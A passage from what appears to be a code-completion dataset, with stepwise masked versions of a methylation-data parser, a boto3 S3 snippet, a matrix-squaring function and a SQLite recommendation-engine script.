'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands', 'num_motifs',\n 'sequence'])\n return Methylation(table=table.sort_values(['read_name', 'pos']),\n data_type=file_type, name=name, called_sites=len(table))\n if file_type == 'nanopolish_freq':\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated', 'group_sequence'])\n return Methylation(table=table.sort_values('pos').groupby('pos').\n mean().rolling(window=smoothen, center=True).mean(), data_type=\n file_type, name=name, called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep='\\t', usecols=\n nanocompore_columns_of_interest)\n if window:\n table = table[table['ref_id'] == window.chromosome]\n return Methylation(table=table.sort_values('pos').append({'pos': window\n .end}, ignore_index=True).drop(columns='ref_id').fillna(1.0),\n data_type='nanocompore', name=name, called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, 'rc')\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin,\n end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name, '-' if read.is_reverse else\n '+', pos, qual, mod))\n return Methylation(table=pd.DataFrame(data, columns=['read_name',\n 'strand', 'pos', 'quality', 'mod']).astype(dtype={'mod': 'category',\n 'quality': 'float'}).sort_values(['read_name', 'pos']), data_type=\n 'ont-cram', name=name, called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\n 'ERROR: modifications on negative strand currently unsupported.'\n )\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate((np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array([i for i, letter in enumerate(read.\n get_forward_sequence()) if letter == base])\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return basemod, refpos[modified_bases], probabilities\n else:\n return None, [None], [None]\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [(10 ** (q / -10)) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(\n methylation_files, names)]\n",
"step-5": "import pandas as pd\nimport pyranges as pr\nimport numpy as np\nimport sys\nimport logging\nfrom methplotlib.utils import file_sniffer\nimport pysam\n\n\nclass Methylation(object):\n def __init__(self, table, data_type, name, called_sites):\n self.table = table\n self.data_type = data_type\n self.name = name\n self.called_sites = called_sites\n\n\ndef read_meth(filename, name, window, smoothen=5):\n \"\"\"\n converts a file from nanopolish to a pandas dataframe\n input can be from calculate_methylation_frequency\n which will return a dataframe with 'chromosome', 'pos', 'methylated_frequency'\n smoothening the result by a rolling average\n\n input can also be raw data per read, optionally phased\n which will return a dataframe with 'read', 'chromosome', 'pos', 'log_lik_ratio', 'strand'\n \"\"\"\n file_type = file_sniffer(filename)\n logging.info(\"File is of type {}\".format(file_type))\n try:\n if file_type.startswith(\"nanopolish\"):\n return parse_nanopolish(filename, file_type, name, window, smoothen=smoothen)\n elif file_type == \"nanocompore\":\n return parse_nanocompore(filename, name, window)\n elif file_type == \"ont-cram\":\n return parse_ont_cram(filename, name, window)\n except Exception:\n sys.stderr.write(\"\\n\\n\\nInput file {} not recognized!\\n\".format(filename))\n sys.stderr.write(\"\\n\\n\\nDetailed error:\\n\")\n raise\n\n\ndef parse_nanopolish(filename, file_type, name, window, smoothen=5):\n table = pd.read_csv(filename, sep=\"\\t\")\n gr = pr.PyRanges(table.rename(columns={\"start\": \"Start\", \"chromosome\": \"Chromosome\",\n \"end\": \"End\", \"Strand\": \"strand\"}))\n logging.info(\"Read the file in a dataframe.\")\n\n if window:\n gr = gr[window.chromosome, window.begin:window.end]\n try:\n gr.pos = np.floor(gr.drop().df[[\"Start\", \"End\"]].mean(axis=1))\n except KeyError:\n sys.stderr.write(\"\\n\\n\\nProblem parsing nanopolish file {}!\\n\".format(filename))\n sys.stderr.write(\"Could it be that there are no calls in your selected window?\\n\")\n sys.stderr.write(\"\\n\\n\\nDetailed error:\\n\")\n raise\n\n table = gr.df\n\n if file_type in ['nanopolish_call', 'nanopolish_phased']:\n\n table = table.drop(columns=['Start', 'End', 'log_lik_methylated',\n 'log_lik_unmethylated', 'num_calling_strands',\n 'num_motifs', 'sequence'])\n return Methylation(\n table=table.sort_values(['read_name', 'pos']),\n data_type=file_type,\n name=name,\n called_sites=len(table))\n if file_type == \"nanopolish_freq\":\n called_sites = table.called_sites\n table = table.drop(columns=['Start', 'End', 'num_motifs_in_group',\n 'called_sites', 'called_sites_methylated',\n 'group_sequence'])\n return Methylation(\n table=table.sort_values('pos')\n .groupby('pos')\n .mean()\n .rolling(window=smoothen, center=True)\n .mean(),\n data_type=file_type,\n name=name,\n called_sites=called_sites.sum())\n\n\ndef parse_nanocompore(filename, name, window):\n def nanocompore_columns_of_interest(column):\n if column in ['pos', 'ref_id']:\n return True\n elif column.endswith('pvalue_context_2') or column.endswith('pvalue'):\n return True\n else:\n return False\n table = pd.read_csv(filename, sep=\"\\t\", usecols=nanocompore_columns_of_interest)\n if window:\n table = table[table[\"ref_id\"] == window.chromosome]\n return Methylation(\n table=table.sort_values('pos')\n .append({'pos': window.end}, ignore_index=True)\n .drop(columns=\"ref_id\")\n .fillna(1.0),\n data_type='nanocompore',\n name=name,\n called_sites=len(table))\n\n\ndef parse_ont_cram(filename, name, window):\n cram = pysam.AlignmentFile(filename, \"rc\")\n data = []\n for read in cram.fetch(reference=window.chromosome, start=window.begin, end=window.end):\n if not read.is_supplementary and not read.is_secondary:\n mod, positions, quals = get_modified_reference_positions(read)\n for pos, qual in zip(positions, quals):\n if pos is not None:\n data.append((read.query_name,\n '-' if read.is_reverse else '+',\n pos,\n qual,\n mod))\n return Methylation(\n table=pd.DataFrame(data, columns=['read_name', 'strand', 'pos', 'quality', 'mod'])\n .astype(dtype={'mod': 'category', 'quality': 'float'})\n .sort_values(['read_name', 'pos']),\n data_type=\"ont-cram\",\n name=name,\n called_sites=len(data))\n\n\ndef get_modified_reference_positions(read):\n if read.has_tag('MM'):\n basemod = read.get_tag('MM').split(',', 1)[0]\n if '-' in basemod:\n sys.exit(\"ERROR: modifications on negative strand currently unsupported.\")\n base, mod = basemod.split('+')\n deltas = [int(i) for i in read.get_tag('MM').split(',')[1:]]\n probabilities = phred_to_probability(read.get_tag('MP'))\n locations = np.cumsum(deltas) + np.concatenate(\n (np.zeros(shape=1),\n np.ones(shape=len(deltas) - 1))).astype('int')\n base_index = np.array(\n [i for i, letter in enumerate(read.get_forward_sequence()) if letter == base]\n )\n modified_bases = base_index[locations]\n refpos = np.array(read.get_reference_positions(full_length=True))\n if read.is_reverse:\n refpos = np.flipud(refpos)\n probabilities = probabilities[::-1]\n return (basemod, refpos[modified_bases], probabilities)\n else:\n return (None, [None], [None])\n\n\ndef errs_tab(n):\n \"\"\"Generate list of error rates for qualities less than equal than n.\"\"\"\n return [10**(q / -10) for q in range(n + 1)]\n\n\ndef phred_to_probability(quals, tab=errs_tab(128)):\n return [tab[ord(q) - 33] for q in quals]\n\n\ndef get_data(methylation_files, names, window, smoothen=5):\n \"\"\"\n Import methylation data from all files in the list methylation_files\n\n Data can be either frequency or raw.\n\n data is extracted within the window args.window\n Frequencies are smoothened using a sliding window\n \"\"\"\n return [read_meth(f, n, window, smoothen) for f, n in zip(methylation_files, names)]\n",
"step-ids": [
5,
8,
10,
11,
12
]
}
|
[
5,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
import boto3
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,
CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,
Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
<|reserved_special_token_1|>
#proper clarification for requirement is required
import boto3
s3_resource = boto3.resource('s3')
s3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})
s3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)
s3_resource.Object(second_bucket_name, first_file_name).delete()
|
flexible
|
{
"blob_id": "44097da54a0bb03ac14196712111a1489a956689",
"index": 5387,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-3": "<mask token>\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-4": "import boto3\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME,\n CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name,\n Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-5": "#proper clarification for requirement is required\nimport boto3\ns3_resource = boto3.resource('s3')\ns3_resource.create_bucket(Bucket=YOUR_BUCKET_NAME, CreateBucketConfiguration={'LocationConstraint': 'eu-west-1'})\ns3_resource.Bucket(first_bucket_name).upload_file(Filename=first_file_name, Key=first_file_name)\ns3_resource.Object(second_bucket_name, first_file_name).delete()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def square_matrix_simple(matrix=[]):
"""This function will compute the square root of all integers in
a matrix. """
new_matrix = []
for index in matrix:
jndex = 0
new_row = []
while jndex < len(index):
new_row.append(index[jndex] ** 2)
jndex += 1
new_matrix.append(new_row)
return new_matrix
<|reserved_special_token_1|>
#!/usr/bin/python3
def square_matrix_simple(matrix=[]):
'''This function will compute the square root of all integers in
a matrix. '''
new_matrix = []
for index in matrix:
jndex = 0
new_row = []
while jndex < len(index):
new_row.append(index[jndex] ** 2)
jndex += 1
new_matrix.append(new_row)
return new_matrix
|
flexible
|
{
"blob_id": "b090e92fe62d9261c116529ea7f480daf8b3e84e",
"index": 6543,
"step-1": "<mask token>\n",
"step-2": "def square_matrix_simple(matrix=[]):\n \"\"\"This function will compute the square root of all integers in\n a matrix. \"\"\"\n new_matrix = []\n for index in matrix:\n jndex = 0\n new_row = []\n while jndex < len(index):\n new_row.append(index[jndex] ** 2)\n jndex += 1\n new_matrix.append(new_row)\n return new_matrix\n",
"step-3": "#!/usr/bin/python3\ndef square_matrix_simple(matrix=[]):\n\n '''This function will compute the square root of all integers in\n a matrix. '''\n\n new_matrix = []\n\n for index in matrix:\n jndex = 0\n new_row = []\n while jndex < len(index):\n new_row.append(index[jndex] ** 2)\n jndex += 1\n new_matrix.append(new_row)\n return new_matrix\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
__author__ = 'tomer'
import sqlite3
from random import randint
import test_data
def init_database(conn):
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS catalogs
(id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)''')
c.execute('''CREATE TABLE IF NOT EXISTS products
(id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)''')
c.execute('''CREATE TABLE IF NOT EXISTS users
(id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)''')
c.execute('''CREATE TABLE IF NOT EXISTS products_bought
(id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)''')
c.execute('''CREATE TABLE IF NOT EXISTS product_context
(id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)''')
c.execute('''CREATE TABLE IF NOT EXISTS recommendations
(id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)''')
def load_fake_data(conn):
c = conn.cursor()
c.execute('''DELETE FROM catalogs''')
c.execute('''DELETE FROM products''')
c.execute('''DELETE FROM users''')
c.execute('''DELETE FROM products_bought''')
c.execute('''DELETE FROM product_context''')
c.execute('''DELETE FROM recommendations''')
catalogs = []
c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('BestBuy',))
catalogs.append(c.lastrowid)
c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''',('RiteAid',))
catalogs.append(c.lastrowid)
ppl = []
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Tomer',))
ppl.append(c.lastrowid)
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Alex',))
ppl.append(c.lastrowid)
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Matt',))
ppl.append(c.lastrowid)
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Rachael',))
ppl.append(c.lastrowid)
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Sam',))
ppl.append(c.lastrowid)
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Joey',))
ppl.append(c.lastrowid)
products = []
# Load fake products
for i in range(1,20):
c.execute('''INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)''',(randint(1,2000),catalogs[randint(0,len(catalogs)-1)],'Movie' + str(i),randint(1,2000),'Title' + str(i)))
products.append(c.lastrowid)
# Load fake transactions
for i in range(1,50):
c.execute('''INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)''',(ppl[randint(0,len(ppl)-1)],products[randint(0,len(products)-1)]))
values = (c.lastrowid,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,5),randint(0,30))
c.execute('''INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''',values)
# Load fake recommendations
for i in range(1,1000):
product_id = products[randint(0, len(products) - 1)]
c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')''',(ppl[randint(0,len(ppl)-1)],product_id))
values = (c.lastrowid,product_id,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,3),randint(0,3))
c.execute('''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',values)
conn.commit()
oses = ['IOS', 'Android']#, 'Windows10', 'macOS']
device = ['mobile']#, 'computer']
'''
times = ['10:33 AM',
'2:38 PM',
'3:01 AM',
'12:31 AM',
'2:56 PM',
'8:01 AM',
'5:00 PM',
'9:38 PM',
'3:01 AM']
'''
times = ['morning', 'afternoon', 'night']
days = ['M']#['M', 'T', 'W', 'R', 'F', 'S', 'Su']
'''
lats = ['-149.8935557',
'-149.9054948',
'-149.7522',
'-149.8643361',
'-149.8379726',
'-149.9092788',
'-149.7364877',
'-149.8211',
'-149.8445832',
'-149.9728678']
'''
lats = ['north']#, 'south']
'''
lons = ['61.21759217',
'61.19533942',
'61.2297',
'61.19525062',
'61.13751355',
'61.13994658',
'61.19533265',
'61.2156',
'61.13806145',
'61.176693']
'''
lons = ['east']#, 'west']
def get_users(conn):
c = conn.cursor()
c.execute('''select * from users''')
return c.fetchall()
def get_catalogs(conn):
c = conn.cursor()
c.execute('''select * from catalogs''')
return c.fetchall()
def get_products(conn, catalog_id):
c = conn.cursor()
c.execute('''select * from products where catalog_id = ?''',(catalog_id,))
return c.fetchall()
def get_product_by_id(conn, catalog_id, product_id):
c = conn.cursor()
c.execute('''SELECT * FROM products WHERE catalog_id = ? AND id = ?''',(catalog_id,product_id))
return c.fetchall()
def get_products_bought(conn, catalog_id):
c = conn.cursor()
c.execute('''select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?''',(catalog_id,))
return c.fetchall()
def get_all_data(conn):
c = conn.cursor()
c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id''')
return c. fetchall()
def get_data_for_user(conn,userid):
c = conn.cursor()
c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?''',(userid,))
return c.fetchall()
def get_data_for_user_and_catalog(conn, userid, catalogid):
c = conn.cursor()
c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?''',(userid,catalogid))
return c.fetchall()
def get_transactions_for_catalog(conn,catalogid):
c = conn.cursor()
c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?''',(catalogid,))
return c.fetchall()
def get_recommendations_by_user(conn,userId):
c = conn.cursor()
c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?''',(userId,))
return c.fetchall()
def get_recommendations_by_product(conn,productId):
c = conn.cursor()
c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?''',(productId,))
return c.fetchall()
def get_connection():
return sqlite3.connect('recommendation_engine.db')
def generate_context(product_id):
return [product_id, device[randint(0, len(device) - 1)], oses[randint(0, len(oses) - 1)],
times[randint(0, len(times) - 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)],
lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)]
def add_recommendation(conn, product_ids,user_ids,contexts):
ids = []
c = conn.cursor()
for i in range(0,len(product_ids)):
product_id = product_ids[i]
user_id = user_ids[i]
context = contexts[i]
c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')''',
(user_id, product_id))
context.insert(0,c.lastrowid)
ids.append(c.lastrowid)
c.execute( '''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',
context)
conn.commit()
c.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)' %
','.join('?'*len(ids)), ids)
return c.fetchall()
def get_probability(conn, x, giveny):
c = conn.cursor()
query = '''select count(*) from product_context where '''
first = True
params = []
for key,val in x.items():
if not first:
query += ' and '
else:
first = False
query += str(key) + '=?'
params.append(str(val))
c.execute(query,params)
total = c.fetchone()[0]
for key,val in giveny.items():
query += ' and ' + str(key) + '=?'
params.append(str(val))
c.execute(query,params)
smaller = c.fetchone()[0]
if total == 0:
return 0
else:
return smaller/float(total)
def load_test_data(conn):
c = conn.cursor()
# Clear database
c.execute('''DELETE FROM catalogs''')
c.execute('''DELETE FROM products''')
c.execute('''DELETE FROM users''')
c.execute('''DELETE FROM products_bought''')
c.execute('''DELETE FROM product_context''')
c.execute('''DELETE FROM recommendations''')
# Initialize users
user_names = test_data.USER_NAMES
# Initialize movie names
product_names = test_data.PRODUCT_NAMES
# Initialize Prices
prices = test_data.POSSIBLE_PRICES
# Load test catalog
catalog_ids = []
c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''', ('MovieDatabase',))
catalog_ids.append(c.lastrowid)
# Load test users
user_ids = []
for user in user_names:
c.execute('''INSERT INTO users (user_name) VALUES (?)''', (user,))
user_ids.append(c.lastrowid)
# Load test products
product_ids = []
for product in product_names:
values = (randint(1, 2000), catalog_ids[0], product, prices[randint(0, len(prices)-1)], 'desc')
c.execute('''INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)''', values)
product_ids.append(c.lastrowid)
# Load fake transactions
for i in range(1, 50):
values = (user_ids[randint(0, len(user_ids)-1)], product_ids[randint(0, len(product_ids)-1)])
c.execute('''INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)''', values)
values = (c.lastrowid,
device[randint(0, len(device) - 1)],
oses[randint(0, len(oses) - 1)],
times[randint(0, len(times) - 1)],
days[randint(0, len(days) - 1)],
lats[randint(0, len(lats) - 1)],
lons[randint(0, len(lons) - 1)],
randint(0, 3),
randint(0, 3))
c.execute('''INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''', values)
# Load fake recommendations
for i in range(1, 1000):
product_id = product_ids[randint(0, len(product_ids)-1)]
values = (user_ids[randint(0, len(user_ids)-1)], product_id,)
c.execute('''INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')''', values)
values =(c.lastrowid,
product_id,
device[randint(0, len(device) - 1)],
oses[randint(0, len(oses) - 1)],
times[randint(0, len(times) - 1)],
days[randint(0, len(days) - 1)],
lats[randint(0, len(lats) - 1)],
lons[randint(0, len(lons) - 1)],
randint(0, 3),
randint(0, 3))
c.execute('''INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''', values)
conn.commit()
|
normal
|
{
"blob_id": "46b1e5adbd956c35820d7d2b17628364388cdcd7",
"index": 3638,
"step-1": "<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\n<mask token>\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('select * from users')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('select * from catalogs')\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('SELECT * FROM products WHERE catalog_id = ? AND id = ?', (\n catalog_id, product_id))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id'\n )\n return c.fetchall()\n\n\ndef get_data_for_user(conn, userid):\n c = conn.cursor()\n c.execute(\n 'select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?'\n , (userid,))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef get_recommendations_by_product(conn, productId):\n c = conn.cursor()\n c.execute(\n 'select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?'\n , (productId,))\n return c.fetchall()\n\n\n<mask token>\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0,\n len(oses) - 1)], times[randint(0, len(times) - 1)], days[randint(0,\n len(days) - 1)], lats[randint(0, len(lats) - 1)], lons[randint(0, \n len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\n<mask token>\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = 'select count(*) from product_context where '\n first = True\n params = []\n for key, val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n total = c.fetchone()[0]\n for key, val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query, params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller / float(total)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_database(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS catalogs\n (id INTEGER PRIMARY KEY AUTOINCREMENT, catalog_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products\n (id INTEGER PRIMARY KEY AUTOINCREMENT, sku_id INTEGER, catalog_id INTEGER, product_name TEXT, price FLOAT, description TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS users\n (id INTEGER PRIMARY KEY AUTOINCREMENT, user_name TEXT)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS products_bought\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER,product_id INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS product_context\n (id INTEGER PRIMARY KEY AUTOINCREMENT,recommendation_id INTEGER, product_id INTEGER, device TEXT, os TEXT, time_of_day TEXT, day_of_week TEXT, latitude float, longitude float,num_items_in_cart INTEGER, purchases_in_last_month INTEGER)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS recommendations\n (id INTEGER PRIMARY KEY AUTOINCREMENT,user_id INTEGER, product_id INTEGER, interacted BOOLEAN)\"\"\"\n )\n\n\ndef load_fake_data(conn):\n c = conn.cursor()\n c.execute('DELETE FROM catalogs')\n c.execute('DELETE FROM products')\n c.execute('DELETE FROM users')\n c.execute('DELETE FROM products_bought')\n c.execute('DELETE FROM product_context')\n c.execute('DELETE FROM recommendations')\n catalogs = []\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('BestBuy',))\n catalogs.append(c.lastrowid)\n c.execute('INSERT INTO catalogs (catalog_name) VALUES (?)', ('RiteAid',))\n catalogs.append(c.lastrowid)\n ppl = []\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Alex',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Matt',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Sam',))\n ppl.append(c.lastrowid)\n c.execute('INSERT INTO users (user_name) VALUES (?)', ('Joey',))\n ppl.append(c.lastrowid)\n products = []\n for i in range(1, 20):\n c.execute(\n 'INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES 